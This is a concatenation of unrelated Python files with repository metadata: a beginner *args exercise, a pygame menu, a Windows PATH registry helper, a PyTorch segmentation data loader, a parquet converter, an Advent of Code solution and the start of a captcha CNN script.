def print_two(*args):
arg1, arg2 = args
print "arg1: %r, arg2: %r" % (arg1, arg2)
#ok, the *args is actually pointless, we can just do this
def print_two_again(arg1, arg2):
print "arg1: %r, arg2: %r" % (arg1, arg2)
#this just takes one argument
def print_one(arg1):
print "arg1: %r" % arg1
#this one takes no arguments
def print_none():
print "I got nothin'."
def print_places(*argv):
place1, place2, place3 = argv
print "place1: %r \t place2: %r \t place3: %r" %(place1, place2, place3)
print_two("Zed","Shaw")
print_two_again("Zed","Shaw")
print_one("First!")
print_none()
print_places("Bengaluru", "Chennai", "New Delhi")
| 24.172414 | 76 | 0.663338 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 321 | 0.457917 |
2190f77ed4afd28489afe1b10eb418ec19a517fe | 5,182 | py | Python | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | study_tool/entities/menu.py | cubeman99/russian-study-tool | b073df4694f1ad064a780088cdcb1436e1bde7e9 | [
"MIT"
] | null | null | null | from enum import IntEnum
import os
import pygame
import random
import time
import cmg
import cmg.mathlib
from cmg.application import *
from cmg.graphics import *
from cmg.input import *
from study_tool.config import Config
from study_tool.entities.entity import Entity
class Menu(Entity):
def __init__(self, options, viewport):
super().__init__()
self.cursor = 0.0
self.options = list(options)
self.viewport = viewport
self.option_font = pygame.font.Font(None, 42)
self.option_spacing = 40
self.option_margin = 48
self.scroll_position = 0.0
self.option_border_thickness = 4
def selected_option(self):
option_index = int(round(self.cursor))
return self.options[option_index]
def get_option_background_color(self, index, option, highlighted=False):
if highlighted:
return Config.option_highlighted_background_color
else:
return Config.option_background_colors[index % 2]
def get_option_border_color(self, index, option, highlighted=False):
if highlighted:
return Config.option_highlighted_border_color
else:
return Config.option_border_colors[index % 2]
def draw_menu_option_text(self, g, option, rect, highlighted=False):
if highlighted:
text_color = Config.option_highlighted_text_color
else:
text_color = Config.option_text_color
if isinstance(option, tuple):
option = option[0]
g.draw_text(rect.x + 16, rect.y + (rect.height / 2),
text=str(option), font=self.option_font,
color=text_color, align=cmg.Align.MiddleLeft)
def update(self, dt):
app = self.context
# Update cursor movement
move = app.inputs[2].get_amount() - app.inputs[0].get_amount()
sign = cmg.mathlib.sign(move)
speed = Config.menu_cursor_speed
self.cursor += cmg.mathlib.pow(abs(move), 1.5) * sign * dt * speed
if self.cursor < 0.5:
self.cursor += len(self.options)
if self.cursor > len(self.options) - 0.5:
self.cursor -= len(self.options)
option_list_height = len(self.options) * self.option_spacing
option_area_height = self.viewport.height
if option_list_height > option_area_height:
desired_scroll_position = (((self.cursor + 0.5) * self.option_spacing) -
option_area_height / 2)
desired_scroll_position = max(0, desired_scroll_position)
desired_scroll_position = min(desired_scroll_position,
option_list_height - option_area_height)
self.scroll_position = cmg.mathlib.lerp(
self.scroll_position,
desired_scroll_position,
0.2)
if abs(self.scroll_position - desired_scroll_position) < 2:
self.scroll_position = desired_scroll_position
else:
self.scroll_position = 0
def draw(self, g):
top = -self.scroll_position
option_index = int(round(self.cursor))
option_top = self.viewport.y + top
row_width = self.viewport.width - (self.option_margin * 2)
border_row_width = row_width + (self.option_border_thickness * 2)
# Draw the cursor
cursor_y = option_top + ((self.cursor + 0.5) * self.option_spacing)
g.fill_rect(self.viewport.x + self.option_margin -
self.option_border_thickness - Config.option_cursor_width,
cursor_y - (Config.option_cursor_height / 2),
border_row_width + (Config.option_cursor_width * 2),
Config.option_cursor_height,
color=Config.option_cursor_color)
# Draw menu options
for index, option in enumerate(self.options):
y = option_top + (index * self.option_spacing)
center_y = y + (self.option_spacing / 2)
highlighted = index == option_index
row_color = self.get_option_background_color(
index, option, highlighted)
border_color = self.get_option_border_color(
index, option, highlighted)
row_rect = pygame.Rect(self.viewport.x + self.option_margin, y,
row_width, self.option_spacing)
# Draw the option border
border_rect = pygame.Rect(row_rect)
border_rect.inflate_ip(self.option_border_thickness * 2, 0)
if index == 0:
border_rect.y -= self.option_border_thickness
border_rect.height += self.option_border_thickness
if index == len(self.options) - 1:
border_rect.height += self.option_border_thickness
g.fill_rect(border_rect, color=border_color)
# Draw the row background
g.fill_rect(row_rect, color=row_color)
# Draw the option name
self.draw_menu_option_text(g, option, row_rect,
highlighted=highlighted)
| 40.484375 | 84 | 0.614628 | 4,910 | 0.947511 | 0 | 0 | 0 | 0 | 0 | 0 | 131 | 0.02528 |
2191076de1edb4c0b0a54d9d4d3796be34c4306f | 3,677 | py | Python | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | zhangwei_helper/function/Regedit.py | zwzw911/zhangwei_helper | 8696533f5df50464d619a35834ec19d514a1b13b | [
"MIT"
] | null | null | null | '''
对windows的注册表进行操作
_open_key: 返回key
_read_key_value:读取key下一个value的值和类型
_save_key_value:以某种类型的方式,把值保存到某个key中
read_PATH_value:读取环境变量PATH的值
append_value_in_PATH:为PATH添加一个值
del_value_in_PATH:从PATH中删除一个值
check_key_value_exists(key,value_name):检查某个key小,value_name是否存在
create_value(key,value_name,value_type,value): 直接调用_save_key_value
delete_value(key,value_name): 删除key下的value
'''
import winreg
def _open_key(root_key_name,sub_key_name):
try:
key = winreg.OpenKey(root_key_name, sub_key_name,0 ,winreg.KEY_ALL_ACCESS)
except Exception as e:
if root_key_name == winreg.HKEY_CURRENT_USER:
root_key_name = 'HKEY_CURRENT_USER'
elif root_key_name == winreg.HKEY_CLASSES_ROOT:
root_key_name = 'HKEY_CLASSES_ROOT'
elif root_key_name == winreg.HKEY_CURRENT_CONFIG:
root_key_name = 'HKEY_CURRENT_CONFIG'
elif root_key_name == winreg.HKEY_DYN_DATA:
root_key_name = 'HKEY_DYN_DATA'
elif root_key_name == winreg.HKEY_LOCAL_MACHINE:
root_key_name = 'HKEY_LOCAL_MACHINE'
elif root_key_name == winreg.HKEY_PERFORMANCE_DATA:
root_key_name = 'HKEY_PERFORMANCE_DATA'
elif root_key_name == winreg.HKEY_USERS:
root_key_name = 'HKEY_USERS'
raise EnvironmentError('注册表的项%s\%s不存在' % (root_key_name,sub_key_name))
return key
# val, tpe = winreg.QueryValueEx(sub_item, key_name)
def _read_key_value(key,value_name):
val, tpe = winreg.QueryValueEx(key, value_name)
return val,tpe
def _save_key_value(key,value_name,value_type,value):
# key = winreg.OpenKey(sub_item,key_name)
# v,t = _read_key_value(sub_item,key_name)
winreg.SetValueEx(key,value_name, 0, value_type, value)
def check_key_value_exists(key,value_name):
# key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
sub_key_num, value_num, last_modified = winreg.QueryInfoKey(key)
# print(winreg.EnumValue(sub_item, 2))
# winreg.EnumKey(sub_item, 1)
# print(list(range(0,key_num)))
if value_num > 0:
for idx in list(range(0, value_num)):
tmp_val_name, tmp_val, idx = winreg.EnumValue(key, idx)
if tmp_val_name.lower() == value_name.lower():
return True
return False
def create_value(key,value_name,value_type,value):
_save_key_value(key,value_name,value_type,value)
def delete_value(key,value_name):
winreg.DeleteValue(key,value_name)
def read_PATH_value():
'''
读取windown环境变量PATH的内容
:return:
'''
root_key = winreg.HKEY_CURRENT_USER
sub_key_name = r'Environment'
value_name = r'PATH'
key = _open_key(root_key, sub_key_name)
val, tpe = _read_key_value(key, value_name)
return val,tpe
# print(val)
def append_value_in_PATH(v):
'''
把v添加到系统变量PATH中去
:param v:
:return:
'''
root_key = winreg.HKEY_CURRENT_USER
sub_key_name = r'Environment'
value_name = r'PATH'
key = _open_key(root_key, sub_key_name)
val, tpe = _read_key_value(key,value_name)
#检测是否包含
tmp = val.split(';')
if v not in tmp:
_save_key_value(key, value_name, tpe,val+';'+v)
winreg.CloseKey(key)
def del_value_in_PATH(v):
'''
把v添加到系统变量PATH中去
:param v:
:return:
'''
root_key = winreg.HKEY_CURRENT_USER
sub_key_name = r'Environment'
value_name = r'PATH'
key = _open_key(root_key, sub_key_name)
val, tpe = _read_key_value(key,value_name)
tmp = val.split(';')
tmp.remove(v)
_save_key_value(key, value_name, tpe,';'.join(tmp))
winreg.CloseKey(key)
# key = _open_key(winreg.HKEY_CURRENT_USER, r'Environment')
# delete_value(key, 'test') | 30.89916 | 82 | 0.700027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,411 | 0.359124 |
2192768bff882444e0830f98671a750d87dcfce9 | 22,767 | py | Python | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | deep_staple/HybridIdLoader.py | multimodallearning/deep_staple | a27ed9e214bbac96aeab122b05b59b0222cce5c5 | [
"MIT"
] | null | null | null | import warnings
from collections.abc import Iterable
from collections import OrderedDict
import torch
import numpy as np
from torch.utils.data import Dataset
from deep_staple.utils.torch_utils import interpolate_sample, augmentNoise, spatial_augment, torch_manual_seeded, ensure_dense
from deep_staple.utils.common_utils import LabelDisturbanceMode
class HybridIdLoader(Dataset):
def __init__(self,
data_load_function,
ensure_labeled_pairs=True, use_additional_data=False, resample=True,
size:tuple=(96,96,60), normalize:bool=True,
max_load_3d_num=None, crop_3d_w_dim_range=None, modified_3d_label_override=None,
prevent_disturbance=False,
use_2d_normal_to=None, crop_2d_slices_gt_num_threshold=None, pre_interpolation_factor=2.,
fixed_weight_file = None, fixed_weight_min_quantile=None, fixed_weight_min_value=None
):
self.label_tags = []
self.use_2d_normal_to = use_2d_normal_to
self.crop_2d_slices_gt_num_threshold = crop_2d_slices_gt_num_threshold
self.prevent_disturbance = prevent_disturbance
self.do_augment = False
self.use_modified = False
self.disturbed_idxs = []
self.augment_at_collate = False
self.pre_interpolation_factor = pre_interpolation_factor
self.extract_3d_id = lambda _:_
self.extract_short_3d_id = lambda _:_
self.img_paths = {}
self.label_paths = {}
self.img_data_3d = {}
self.label_data_3d = {}
self.modified_label_data_3d = {}
# Load base 3D data
(self.img_paths, self.label_paths,
self.img_data_3d, self.label_data_3d,
self.modified_label_data_3d,
self.extract_3d_id, self.extract_short_3d_id) = data_load_function()
# Retrieve slices and plugin modified data
self.img_data_2d = {}
self.label_data_2d = {}
self.modified_label_data_2d = {}
# Postprocessing of 3d volumes
print("Postprocessing 3D volumes")
orig_3d_num = len(self.label_data_3d.keys())
if ensure_labeled_pairs:
labelled_keys = set(self.label_data_3d.keys())
unlabelled_imgs = set(self.img_data_3d.keys()) - labelled_keys
unlabelled_modified_labels = set([self.extract_3d_id(key) for key in self.modified_label_data_3d.keys()]) - labelled_keys
for del_key in unlabelled_imgs:
del self.img_data_3d[del_key]
for del_key in unlabelled_modified_labels:
del self.modified_label_data_3d[del_key]
if max_load_3d_num:
for del_key in sorted(list(self.img_data_3d.keys()))[max_load_3d_num:]:
del self.img_data_3d[del_key]
for del_key in sorted(list(self.label_data_3d.keys()))[max_load_3d_num:]:
del self.label_data_3d[del_key]
for del_key in sorted(list(self.modified_label_data_3d.keys()))[max_load_3d_num:]:
del self.modified_label_data_3d[del_key]
postprocessed_3d_num = len(self.label_data_3d.keys())
print(f"Removed {orig_3d_num - postprocessed_3d_num} 3D images in postprocessing")
#check for consistency
print(f"Equal image and label numbers: {set(self.img_data_3d)==set(self.label_data_3d)==set(self.modified_label_data_3d)} ({len(self.img_data_3d)})")
img_stack = torch.stack(list(self.img_data_3d.values()), dim=0)
img_mean, img_std = img_stack.mean(), img_stack.std()
label_stack = torch.stack(list(self.label_data_3d.values()), dim=0)
print("Image shape: {}, mean.: {:.2f}, std.: {:.2f}".format(img_stack.shape, img_mean, img_std))
print("Label shape: {}, max.: {}".format(label_stack.shape,torch.max(label_stack)))
if use_2d_normal_to:
if use_2d_normal_to == "D":
slice_dim = -3
if use_2d_normal_to == "H":
slice_dim = -2
if use_2d_normal_to == "W":
slice_dim = -1
for _3d_id, image in self.img_data_3d.items():
for idx, img_slc in [(slice_idx, image.select(slice_dim, slice_idx)) \
for slice_idx in range(image.shape[slice_dim])]:
# Set data view for id like "003rW100"
self.img_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = img_slc
for _3d_id, label in self.label_data_3d.items():
for idx, lbl_slc in [(slice_idx, label.select(slice_dim, slice_idx)) \
for slice_idx in range(label.shape[slice_dim])]:
# Set data view for id like "003rW100"
self.label_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = lbl_slc
for _3d_id, label in self.modified_label_data_3d.items():
for idx, lbl_slc in [(slice_idx, label.select(slice_dim, slice_idx)) \
for slice_idx in range(label.shape[slice_dim])]:
# Set data view for id like "003rW100"
self.modified_label_data_2d[f"{_3d_id}{use_2d_normal_to}{idx:03d}"] = lbl_slc
# Postprocessing of 2d slices
print("Postprocessing 2D slices")
orig_2d_num = len(self.label_data_2d.keys())
if self.crop_2d_slices_gt_num_threshold > 0:
for key, label in list(self.label_data_2d.items()):
uniq_vals = label.unique()
if sum(label[label > 0]) < self.crop_2d_slices_gt_num_threshold:
# Delete 2D slices with less than n gt-pixels (but keep 3d data)
del self.img_data_2d[key]
del self.label_data_2d[key]
del self.modified_label_data_2d[key]
postprocessed_2d_num = len(self.label_data_2d.keys())
print(f"Removed {orig_2d_num - postprocessed_2d_num} of {orig_2d_num} 2D slices in postprocessing")
if fixed_weight_file is not None and any([fixed_weight_min_quantile, fixed_weight_min_value]):
fixed_weightdata = torch.load(fixed_weight_file)
fixed_weights = fixed_weightdata['data_parameters'].detach().cpu()
fixed_d_ids = fixed_weightdata['d_ids']
print(f"Fixed weight quantiles are: {np.quantile(fixed_weights, np.linspace(0.,1.,5))}")
if fixed_weight_min_quantile is not None:
fixed_weight_min_value = np.quantile(fixed_weights, fixed_weight_min_quantile)
elif fixed_weight_min_value is not None:
pass
fixed_del_counter = 0
for key, weight in zip(fixed_d_ids, fixed_weights):
if weight < fixed_weight_min_value:
if use_2d_normal_to:
del self.img_data_2d[key]
del self.label_data_2d[key]
del self.modified_label_data_2d[key]
else:
del self.img_data_3d[key]
del self.label_data_3d[key]
del self.modified_label_data_3d[key]
fixed_del_counter+=1
print(f"Removed {fixed_del_counter} data samples by cropping data with fixed weight min value = {fixed_weight_min_value:.3f}")
# Now make sure dicts are ordered
self.img_paths = OrderedDict(sorted(self.img_paths.items()))
self.label_paths = OrderedDict(sorted(self.label_paths.items()))
self.img_data_3d = OrderedDict(sorted(self.img_data_3d.items()))
self.label_data_3d = OrderedDict(sorted(self.label_data_3d.items()))
self.modified_label_data_3d = OrderedDict(sorted(self.modified_label_data_3d.items()))
self.img_data_2d = OrderedDict(sorted(self.img_data_2d.items()))
self.label_data_2d = OrderedDict(sorted(self.label_data_2d.items()))
self.modified_label_data_2d = OrderedDict(sorted(self.modified_label_data_2d.items()))
nonzero_lbl_percentage = torch.tensor([lbl.sum((-2,-1)) > 0 for lbl in self.label_data_2d.values()]).sum()
nonzero_lbl_percentage = nonzero_lbl_percentage/len(self.label_data_2d)
print(f"Nonzero labels: " f"{nonzero_lbl_percentage*100:.2f}%")
nonzero_mod_lbl_percentage = torch.tensor([ensure_dense(lbl)[0].sum((-2,-1)) > 0 for lbl in self.modified_label_data_2d.values()]).sum()
nonzero_mod_lbl_percentage = nonzero_mod_lbl_percentage/len(self.modified_label_data_2d)
print(f"Nonzero modified labels: " f"{nonzero_mod_lbl_percentage*100:.2f}%")
print(f"Loader will use {postprocessed_2d_num} of {orig_2d_num} 2D slices.")
print("Data import finished.")
print(f"Dataloader will yield {'2D' if self.use_2d_normal_to else '3D'} samples")
def get_short_3d_ids(self):
return [self.extract_short_3d_id(_id) for _id in self.get_3d_ids()]
def get_3d_ids(self):
return list(self.img_data_3d.keys())
def get_2d_ids(self):
assert self.use_2d(), "Dataloader does not provide 2D data."
return list(self.img_data_2d.keys())
def get_id_dicts(self, use_2d_override=None):
all_3d_ids = self.get_3d_ids()
id_dicts = []
if self.use_2d(use_2d_override):
for _2d_dataset_idx, _2d_id in enumerate(self.get_2d_ids()):
_3d_id = _2d_id[:-4]
id_dicts.append(
{
'2d_id': _2d_id,
'2d_dataset_idx': _2d_dataset_idx,
'3d_id': _3d_id,
'3d_dataset_idx': all_3d_ids.index(_3d_id),
}
)
else:
for _3d_dataset_idx, _3d_id in enumerate(self.get_3d_ids()):
id_dicts.append(
{
'3d_id': _3d_id,
'3d_dataset_idx': all_3d_ids.index(_3d_id),
}
)
return id_dicts
def switch_2d_identifiers(self, _2d_identifiers):
assert self.use_2d(), "Dataloader does not provide 2D data."
if isinstance(_2d_identifiers, (torch.Tensor, np.ndarray)):
_2d_identifiers = _2d_identifiers.tolist()
elif not isinstance(_2d_identifiers, Iterable) or isinstance(_2d_identifiers, str):
_2d_identifiers = [_2d_identifiers]
_ids = self.get_2d_ids()
if all([isinstance(elem, int) for elem in _2d_identifiers]):
vals = [_ids[elem] for elem in _2d_identifiers]
elif all([isinstance(elem, str) for elem in _2d_identifiers]):
vals = [_ids.index(elem) for elem in _2d_identifiers]
else:
raise ValueError
return vals[0] if len(vals) == 1 else vals
def switch_3d_identifiers(self, _3d_identifiers):
if isinstance(_3d_identifiers, (torch.Tensor, np.ndarray)):
_3d_identifiers = _3d_identifiers.tolist()
elif not isinstance(_3d_identifiers, Iterable) or isinstance(_3d_identifiers, str):
_3d_identifiers = [_3d_identifiers]
_ids = self.get_3d_ids()
if all([isinstance(elem, int) for elem in _3d_identifiers]):
vals = [_ids[elem] for elem in _3d_identifiers]
elif all([isinstance(elem, str) for elem in _3d_identifiers]):
vals = [_ids.index(elem) if elem in _ids else None for elem in _3d_identifiers]
else:
raise ValueError
return vals[0] if len(vals) == 1 else vals
def get_3d_from_2d_identifiers(self, _2d_identifiers, retrn='id'):
assert self.use_2d(), "Dataloader does not provide 2D data."
assert retrn in ['id', 'idx']
if isinstance(_2d_identifiers, (torch.Tensor, np.ndarray)):
_2d_identifiers = _2d_identifiers.tolist()
elif not isinstance(_2d_identifiers, Iterable) or isinstance(_2d_identifiers, str):
_2d_identifiers = [_2d_identifiers]
if isinstance(_2d_identifiers[0], int):
_2d_identifiers = self.switch_2d_identifiers(_2d_identifiers)
vals = []
for item in _2d_identifiers:
_3d_id = self.extract_3d_id(item)
if retrn == 'id':
vals.append(_3d_id)
elif retrn == 'idx':
vals.append(self.switch_3d_identifiers(_3d_id))
return vals[0] if len(vals) == 1 else vals
def use_2d(self, override=None):
if not self.use_2d_normal_to:
return False
elif override is not None:
return override
else:
return True
def __len__(self, use_2d_override=None):
if self.use_2d(use_2d_override):
return len(self.img_data_2d)
return len(self.img_data_3d)
def __getitem__(self, dataset_idx, use_2d_override=None):
use_2d = self.use_2d(use_2d_override)
if use_2d:
all_ids = self.get_2d_ids()
_id = all_ids[dataset_idx]
image = self.img_data_2d.get(_id, torch.tensor([]))
label = self.label_data_2d.get(_id, torch.tensor([]))
# For 2D id cut last 4 "003rW100"
_3d_id = self.get_3d_from_2d_identifiers(_id)
image_path = self.img_paths[_3d_id]
label_path = self.label_paths[_3d_id]
else:
all_ids = self.get_3d_ids()
_id = all_ids[dataset_idx]
image = self.img_data_3d.get(_id, torch.tensor([]))
label = self.label_data_3d.get(_id, torch.tensor([]))
image_path = self.img_paths[_id]
label_path = self.label_paths[_id]
spat_augment_grid = []
if self.use_modified:
if use_2d:
modified_label = self.modified_label_data_2d.get(_id, label.detach().clone())
else:
modified_label = self.modified_label_data_3d.get(_id, label.detach().clone())
else:
modified_label = label.detach().clone()
b_image = image.unsqueeze(0).cuda()
b_label = label.unsqueeze(0).cuda()
modified_label, _ = ensure_dense(modified_label)
b_modified_label = modified_label.unsqueeze(0).cuda()
if self.do_augment and not self.augment_at_collate:
b_image, b_label, b_spat_augment_grid = self.augment(
b_image, b_label, use_2d, pre_interpolation_factor=self.pre_interpolation_factor
)
_, b_modified_label, _ = spatial_augment(
b_label=b_modified_label, use_2d=use_2d, b_grid_override=b_spat_augment_grid,
pre_interpolation_factor=self.pre_interpolation_factor
)
spat_augment_grid = b_spat_augment_grid.squeeze(0).detach().cpu().clone()
elif not self.do_augment:
b_image, b_label = interpolate_sample(b_image, b_label, 2., use_2d)
_, b_modified_label = interpolate_sample(b_label=b_modified_label, scale_factor=2.,
use_2d=use_2d)
image = b_image.squeeze(0).cpu()
label = b_label.squeeze(0).cpu()
modified_label = b_modified_label.squeeze(0).cpu()
if use_2d:
assert image.dim() == label.dim() == 2
else:
assert image.dim() == label.dim() == 3
return {
'image': image,
'label': label,
'modified_label': modified_label,
# if disturbance is off, modified label is equals label
'dataset_idx': dataset_idx,
'id': _id,
'image_path': image_path,
'label_path': label_path,
'spat_augment_grid': spat_augment_grid
}
def get_3d_item(self, _3d_dataset_idx):
return self.__getitem__(_3d_dataset_idx, use_2d_override=False)
def get_data(self, use_2d_override=None):
if self.use_2d(use_2d_override):
img_stack = torch.stack(list(self.img_data_2d.values()), dim=0)
label_stack = torch.stack(list(self.label_data_2d.values()), dim=0)
modified_label_stack = torch.stack(list(self.modified_label_data_2d.values()), dim=0)
else:
img_stack = torch.stack(list(self.img_data_3d.values()), dim=0)
label_stack = torch.stack(list(self.label_data_3d.values()), dim=0)
modified_label_stack = torch.stack(list(self.modified_label_data_3d.values()), dim=0)
return img_stack, label_stack, modified_label_stack
def disturb_idxs(self, all_idxs, disturbance_mode, disturbance_strength=1., use_2d_override=None):
if self.prevent_disturbance:
warnings.warn("Disturbed idxs shall be set but disturbance is prevented for dataset.")
return
use_2d = self.use_2d(use_2d_override)
if all_idxs is not None:
if isinstance(all_idxs, (np.ndarray, torch.Tensor)):
all_idxs = all_idxs.tolist()
self.disturbed_idxs = all_idxs
else:
self.disturbed_idxs = []
# Reset modified data
for idx in range(self.__len__(use_2d_override=use_2d)):
if use_2d:
label_id = self.get_2d_ids()[idx]
self.modified_label_data_2d[label_id] = self.label_data_2d[label_id]
else:
label_id = self.get_3d_ids()[idx]
self.modified_label_data_3d[label_id] = self.label_data_3d[label_id]
# Now apply disturbance
if idx in self.disturbed_idxs:
if use_2d:
label = self.modified_label_data_2d[label_id].detach().clone()
else:
label = self.modified_label_data_3d[label_id].detach().clone()
with torch_manual_seeded(idx):
if str(disturbance_mode)==str(LabelDisturbanceMode.FLIP_ROLL):
roll_strength = 10*disturbance_strength
if use_2d:
modified_label = \
torch.roll(
label.transpose(-2,-1),
(
int(torch.randn(1)*roll_strength),
int(torch.randn(1)*roll_strength)
),(-2,-1)
)
else:
modified_label = \
torch.roll(
label.permute(1,2,0),
(
int(torch.randn(1)*roll_strength),
int(torch.randn(1)*roll_strength),
int(torch.randn(1)*roll_strength)
),(-3,-2,-1)
)
elif str(disturbance_mode)==str(LabelDisturbanceMode.AFFINE):
b_modified_label = label.unsqueeze(0).cuda()
_, b_modified_label, _ = spatial_augment(b_label=b_modified_label, use_2d=use_2d,
bspline_num_ctl_points=6, bspline_strength=0., bspline_probability=0.,
affine_strength=0.09*disturbance_strength,
add_affine_translation=0.18*disturbance_strength, affine_probability=1.)
modified_label = b_modified_label.squeeze(0).cpu()
else:
raise ValueError(f"Disturbance mode {disturbance_mode} is not implemented.")
if use_2d:
self.modified_label_data_2d[label_id] = modified_label
else:
self.modified_label_data_3d[label_id] = modified_label
def train(self, augment=True, use_modified=True):
self.do_augment = augment
self.use_modified = use_modified
def eval(self, augment=False, use_modified=False):
self.train(augment, use_modified)
def set_augment_at_collate(self, augment_at_collate=True):
self.augment_at_collate = augment_at_collate
def get_efficient_augmentation_collate_fn(self):
use_2d = True if self.use_2d_normal_to else False
def collate_closure(batch):
batch = torch.utils.data._utils.collate.default_collate(batch)
if self.augment_at_collate and self.do_augment:
# Augment the whole batch not just one sample
b_image = batch['image'].cuda()
b_label = batch['label'].cuda()
b_modified_label = batch['modified_label'].cuda()
b_image, b_label, b_spat_augment_grid = self.augment(
b_image, b_label, use_2d, pre_interpolation_factor=self.pre_interpolation_factor
)
_, b_modified_label, _ = spatial_augment(
b_label=b_modified_label, use_2d=use_2d, b_grid_override=b_spat_augment_grid,
pre_interpolation_factor=self.pre_interpolation_factor
)
b_spat_augment_grid = b_spat_augment_grid.detach().clone()
batch['image'], batch['label'], batch['modified_label'], batch['spat_augment_grid'] = b_image, b_label, b_modified_label, b_spat_augment_grid
return batch
return collate_closure
def augment(self, b_image, b_label, use_2d,
noise_strength=0.05,
bspline_num_ctl_points=6, bspline_strength=0.03, bspline_probability=.95,
affine_strength=0.2, affine_probability=.45,
pre_interpolation_factor=2.):
if use_2d:
assert b_image.dim() == b_label.dim() == 3, \
f"Augmenting 2D. Input batch of image and " \
f"label should be BxHxW but are {b_image.shape} and {b_label.shape}"
else:
assert b_image.dim() == b_label.dim() == 4, \
f"Augmenting 3D. Input batch of image and " \
f"label should be BxDxHxW but are {b_image.shape} and {b_label.shape}"
b_image = augmentNoise(b_image, strength=noise_strength)
b_image, b_label, b_spat_augment_grid = spatial_augment(
b_image, b_label,
bspline_num_ctl_points=bspline_num_ctl_points, bspline_strength=bspline_strength, bspline_probability=bspline_probability,
affine_strength=affine_strength, affine_probability=affine_probability,
pre_interpolation_factor=pre_interpolation_factor, use_2d=use_2d)
b_label = b_label.long()
return b_image, b_label, b_spat_augment_grid | 45.172619 | 157 | 0.605877 | 22,415 | 0.984539 | 0 | 0 | 0 | 0 | 0 | 0 | 2,328 | 0.102253 |
2192db0d2cc72055b715c3531dbce38ec2537308 | 438 | py | Python | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 17 | 2018-12-19T16:32:38.000Z | 2021-10-05T07:58:15.000Z | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 183 | 2018-12-20T17:03:01.000Z | 2022-02-23T22:21:42.000Z | scripts/model_assembly/parquet_explorer.py | rsulli55/automates | 1647a8eef85c4f03086a10fa72db3b547f1a0455 | [
"Apache-2.0"
] | 5 | 2019-01-04T22:37:49.000Z | 2022-01-19T17:34:16.000Z | import sys
import json
import pandas as pd
def main():
parquet_filename = sys.argv[1]
json_filename = parquet_filename.replace(".parquet", ".json")
print(json_filename)
parquet_df = pd.read_parquet(parquet_filename)
parquet_json = parquet_df.to_json()
parquet_data = json.loads(parquet_json)
print(parquet_data)
json.dump(parquet_data, open(json_filename, "w"))
if __name__ == "__main__":
main()
| 20.857143 | 65 | 0.707763 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 30 | 0.068493 |
219394299c86acbdbecacd314e8a2cf464bd2c78 | 1,720 | py | Python | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | day02/main.py | aschmied/advent-of-code-2020 | 4112cebaf4dc4c6a931824da89ab894d21595673 | [
"BSD-2-Clause"
] | null | null | null | def main():
valid_passwords_by_range_policy = 0
valid_passwords_by_position_policy = 0
with open('input') as f:
for line in f:
policy_string, password = parse_line(line.strip())
policy = Policy.parse(policy_string)
if policy.is_valid_by_range_policy(password):
valid_passwords_by_range_policy += 1
if policy.is_valid_by_position_policy(password):
valid_passwords_by_position_policy += 1
print(f'There are {valid_passwords_by_range_policy} valid passwords by "range" policy.')
print(f'There are {valid_passwords_by_position_policy} valid passwords by "position" policy.')
def parse_line(line):
tokens = line.split(':', 1)
policy_string = tokens[0]
password = tokens[1].strip()
return policy_string, password
class Policy:
def __init__(self, first_number, second_number, letter):
self._first_number = first_number
self._second_number = second_number
self._letter = letter
def is_valid_by_range_policy(self, password):
count = password.count(self._letter)
return count >= self._first_number and count <= self._second_number
def is_valid_by_position_policy(self, password):
index1 = self._first_number - 1
index2 = self._second_number - 1
return (password[index1] == self._letter) != (password[index2] == self._letter)
@classmethod
def parse (cls, string):
tokens = string.split(' ')
first_number_string, second_number_string = tokens[0].split('-')
letter = tokens[1]
return cls(int(first_number_string), int(second_number_string), letter)
if __name__ == '__main__':
main()
| 38.222222 | 98 | 0.676744 | 847 | 0.492442 | 0 | 0 | 256 | 0.148837 | 0 | 0 | 194 | 0.112791 |
21941897416bc012f80774571a8681a87ac48cad | 6,858 | py | Python | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | captcha_cnn/runbycolab.py | Rhysn/captcha_break | 5c2675deaff105a323a80c4631f3cf01d76ae345 | [
"MIT"
] | null | null | null | #! /usr/bin/python3
# coding:utf-8
#pip install graphic-verification-code
from captcha.image import ImageCaptcha
import random,gvcode
import numpy as np
import tensorflow as tf
number = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
'v', 'w', 'x', 'y', 'z']
